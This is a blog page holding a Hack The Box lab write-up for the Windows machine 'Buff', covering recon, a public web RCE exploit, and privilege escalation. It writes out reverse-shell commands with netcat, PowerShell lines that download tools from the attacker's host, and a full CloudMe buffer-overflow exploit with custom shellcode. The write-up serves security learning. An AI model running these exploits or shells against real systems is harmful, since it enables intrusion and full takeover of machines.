<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/"><b>>htb/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/"><b>>buff/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/expl/">expl/</a></li>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/buff/img/">img/</a></li>
				</ul>
			</li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/feline/">feline/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/omni/">omni/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/openkeys/">openkeys/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/sneaky_mailer/">sneaky mailer/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/time/">time/</a></li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Table of Contents</h1>
<ul>
<li>1 Summary<br />
</li>
<li>2 Box Information<br />
</li>
<li>3 Recon<br />
- 3.1 http - 8080<br />
</li>
<li>4 Exploitation<br />
</li>
<li>5 Privilege Escalation<br />
- 5.1 Manual Enumeration<br />
- 5.2 Exploitation of CloudMe 1.11.2<br />
  - 5.2.1 Customizing the exploit<br />
  - 5.2.2 Port forward to make the exploit work<br />
  - 5.2.3 Running the exploit</li>
</ul>
<h1>Summary</h1>
<p>There was a http server on port 8080 which ran Gym Management Software 1.0. I used a premade exploit for this program in order to get a shell on the box.<br />
After a lot of enumeration I found CloudMe_1112.exe in the user's Downloads directory. There was a buffer overflow exploit available on exploitdb for this software.<br />
I modified the shellcode and forwarded the 8888 port from the target to my attacker machine in order to be able to run the exploit. I ran it and I got access to the administrator user.</p>
<h1>Box Information</h1>
<pre><code>Name:       | Buff
OS:         | Windows
Difficulty: | Easy
Points:     | 20
Release:    | 18 Jul 2020
IP:         | 10.10.10.198
</code></pre>
<h1>Recon</h1>
<p>Nmap(TCP): </p>
<pre><code>nmap -sC -sV -T4 -p- 10.10.10.198 -oA scans/nmap.full
</code></pre>
<ul>
<li>This box was very slow so I started manually guessing ports<br />
</li>
<li>Started from 80-&gt;443-&gt;8080 which was working so I took a look at 8080</li>
</ul>
<p>Now, I finally ran an nmap scan on this after it got retired:</p>
<pre><code>Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 08:49 CET
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.32% done; ETC: 08:54 (0:01:14 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.30 seconds
</code></pre>
<ul>
<li>TL;DR: Port <strong>8080</strong> is open.</li>
</ul>
<h2>http - 8080</h2>
<p>The webpage mentions a 'CMS' which is currently used. After a simple exploit-db search I found out there is an <strong>unauthenticated RCE</strong> script.</p>
<p><img src="img/contactpage.png" alt="contactpage" /></p>
<ul>
<li><em>Gym Management Software 1.0</em></li>
</ul>
<p><img src="img/exploitdb_gym.png" alt="exploitdb_gym" /></p>
<p><a href="https://www.exploit-db.com/exploits/48506">https://www.exploit-db.com/exploits/48506</a></p>
<ul>
<li>local copy: <a href="expl/gym_management_rce.py">48506</a></li>
</ul>
<h1>Exploitation</h1>
<p>I downloaded the exploit and ran it without editing anything in the source. And I got a shell.</p>
<pre><code>python2 expl/gym_management_rce.py 'http://10.10.10.198:8080/'
</code></pre>
<p><img src="img/gotuser_shaun.png" alt="gotuser_shaun" /></p>
<pre><code>[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload&gt; whoami

buff\shaun
</code></pre>
<p>I uploaded an <code>nc.exe</code> (which has -e option) in order to get a normal reverse shell.</p>
<pre><code>powershell.exe -exec bypass -c &quot;Invoke-WebRequest 'http://10.10.14.192/nc.exe' -OutFile 'nc.exe'&quot;
</code></pre>
<p><img src="img/ps_uploaded_nc.png" alt="ps_uploaded_nc" /></p>
<p>Target box:</p>
<pre><code>nc.exe -e cmd.exe 10.10.14.192 1337
</code></pre>
<p><img src="img/nc_gotshell.png" alt="nc_gotshell" /></p>
<p>I got a hit:</p>
<pre><code>listening on [any] 1337 ...
connect to [10.10.14.192] from (UNKNOWN) [10.10.10.198] 52677
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload&gt;whoami
whoami
buff\shaun
</code></pre>
<p>I was able to type out the user flag(<code>C:\Users\shaun\Desktop\user.txt:b6431----------------------6fa5a</code>)</p>
<h1>Privilege Escalation</h1>
<h2>Manual Enumeration</h2>
<p>After some manual enumeration(a lot of dir listings) I found an executable in the user's Downloads directory!</p>
<p><img src="img/cloudmeexe.png" alt="cloudmeexe" /></p>
<pre><code>C:\Users\shaun&gt;dir Downloads
dir Downloads
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    &lt;DIR&gt;          .
14/07/2020  13:27    &lt;DIR&gt;          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   8,036,261,888 bytes free

C:\Users\shaun&gt;
</code></pre>
<p>There is a buffer overflow for CloudMe 1.11.2 in exploitdb.</p>
<p><img src="img/cloudme_expldb.png" alt="cloudme_expldb" /></p>
<p>I used the most simple(PoC one):</p>
<p>https://www.exploit-db.com/exploits/48389</p>
<ul>
<li>local copy: <a href="expl/cloudme.py">48389</a></li>
</ul>
<h2>Exploitation of CloudMe 1.11.2</h2>
<h3>Customizing the exploit</h3>
<p>I have to customize the shellcode in order to be able to open a reverse shell.</p>
<p>The standard <code>windows/shell_reverse_tcp</code> didn't work so I used <code>windows/exec</code> with my previously uploaded nc.exe.</p>
<pre><code>msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
</code></pre>
<p>cloudme.py:</p>
<pre><code class="language-py"># Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = &quot;127.0.0.1&quot;

padding1   = b&quot;\x90&quot; * 1052
EIP        = b&quot;\xB5\x42\xA8\x68&quot; # 0x68A842B5 -&gt; PUSH ESP, RET
NOPS       = b&quot;\x90&quot; * 30

#msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
payload =  b&quot;&quot;
payload += b&quot;\xb8\x17\xe4\x16\xfc\xdd\xc1\xd9\x74\x24\xf4\x5a\x29&quot;
payload += b&quot;\xc9\xb1\x3e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2&quot;
payload += b&quot;\xe2\x18\xfe\x7e\x0c\xe1\xff\x1e\x85\x04\xce\x1e\xf1&quot;
payload += b&quot;\x4d\x61\xaf\x72\x03\x8e\x44\xd6\xb0\x05\x28\xfe\xb7&quot;
payload += b&quot;\xae\x87\xd8\xf6\x2f\xbb\x18\x98\xb3\xc6\x4c\x7a\x8d&quot;
payload += b&quot;\x08\x81\x7b\xca\x75\x6b\x29\x83\xf2\xd9\xde\xa0\x4f&quot;
payload += b&quot;\xe1\x55\xfa\x5e\x61\x89\x4b\x60\x40\x1c\xc7\x3b\x42&quot;
payload += b&quot;\x9e\x04\x30\xcb\xb8\x49\x7d\x82\x33\xb9\x09\x15\x92&quot;
payload += b&quot;\xf3\xf2\xb9\xdb\x3b\x01\xc0\x1c\xfb\xfa\xb7\x54\xff&quot;
payload += b&quot;\x87\xcf\xa2\x7d\x5c\x5a\x31\x25\x17\xfc\x9d\xd7\xf4&quot;
payload += b&quot;\x9a\x56\xdb\xb1\xe9\x31\xf8\x44\x3e\x4a\x04\xcc\xc1&quot;
payload += b&quot;\x9d\x8c\x96\xe5\x39\xd4\x4d\x84\x18\xb0\x20\xb9\x7b&quot;
payload += b&quot;\x1b\x9c\x1f\xf7\xb6\xc9\x12\x5a\xdd\x0c\xa1\xe0\x93&quot;
payload += b&quot;\x0f\xb9\xea\x83\x67\x88\x61\x4c\xff\x15\xa0\x28\x0f&quot;
payload += b&quot;\x5c\xe9\x19\x98\x38\x7b\x18\xc5\xbb\x51\x5f\xf0\x3f&quot;
payload += b&quot;\x50\x20\x07\x5f\x11\x25\x43\xd8\xc9\x57\xdc\x8c\xed&quot;
payload += b&quot;\xc4\xdd\x85\xad\xd0\x7d\x5d\x53\x48\x0e\xed\xcf\xfa&quot;
payload += b&quot;\x9a\x69\x9f\x99\x11\x2d\x38\x27\xbb\x91\xb3\xa7\x2f&quot;
payload += b&quot;\x46\x5d\x2c\xec\xf6\xfe\x82\x69\x7e\x64\xfb\x5c\x1b&quot;
payload += b&quot;\x46\x98\xf3\x87\xa8\x3b\x74\x22\x95\xf2\xb4\x82\xe4&quot;
payload += b&quot;\xc4\x9a\xeb\x32\x0b\xd2\x32\x09\x73\x25\x77\x5e\x4b&quot;
payload += b&quot;\x45&quot;

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

overrun    = b&quot;C&quot; * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8889))
	s.send(buf)
except Exception as e:
	print(&quot;RIP&quot;)
</code></pre>
<ul>
<li><strong>Note:</strong> If the vpn ip changes the shellcode must be rebuilt.</li>
</ul>
<h3>Port forward to make the exploit work</h3>
<p>Since there were no python on the box I had to forward the 8888 port to my box then run the exploit locally.</p>
<p>I used <a href="https://github.com/jpillora/chisel/releases/tag/v1.6.0">chisel</a> in order to make the port forwarding.</p>
<ul>
<li>I downloaded both <a href="https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_windows_amd64.gz">windows</a> and <a href="https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_linux_amd64.gz">linux</a> versions</li>
</ul>
<p>I created a server on my kali machine:</p>
<pre><code>./chisel_1.6.0_linux_amd64 server -p 1080 --reverse
</code></pre>
<p><img src="img/chisel_server.png" alt="chisel_server" /></p>
<p>I uploaded the windows executable to the box:</p>
<pre><code>powershell.exe -exec bypass -c &quot;Invoke-WebRequest 'http://10.10.14.192/chisel_1.6.0_windows_amd64' -OutFile 'chisel.exe'&quot;
</code></pre>
<p><img src="img/ps_uploaded_chisel.png" alt="ps_uploaded_chisel" /></p>
<p>On the target windows box I ran the downloaded chisel.exe in client mode:</p>
<pre><code>chisel.exe client 10.10.14.192:1080 R:8889:127.0.0.1:8888
</code></pre>
<p><img src="img/chisel_client.png" alt="chisel_client" /></p>
<p>I also got some output on the server:</p>
<p><img src="img/chisel_server_connected.png" alt="chisel_server_connected" /></p>
<ul>
<li>It's successfully connected</li>
</ul>
<h3>Running the exploit</h3>
<p>I used python2 to run the script:</p>
<pre><code>python2 cloudme.py
</code></pre>
<p>Chisel server output:</p>
<p><img src="img/chisel_server_connection.png" alt="chisel_server_connection" /></p>
<pre><code>2020/07/19 19:55:58 server: proxy#1:R:0.0.0.0:8889=&gt;127.0.0.1:8888: conn#2: Open
2020/07/19 19:55:59 server: proxy#1:R:0.0.0.0:8889=&gt;127.0.0.1:8888: conn#2: Close (sent 1.5KB received 0B)
</code></pre>
<p>My nc listener:</p>
<p><img src="img/gotuser_root.png" alt="gotuser_root" /></p>
<pre><code>nc -lvnp 1338

connect to [10.10.14.192] from (UNKNOWN) [10.10.10.198] 50275
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
whoami
buff\administrator
</code></pre>
<p>I got the administrator user so I also have access to the root flag(<code>C:\Users\Administrator\Desktop\root.txt:05759----------------------1aaad</code>)</p>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
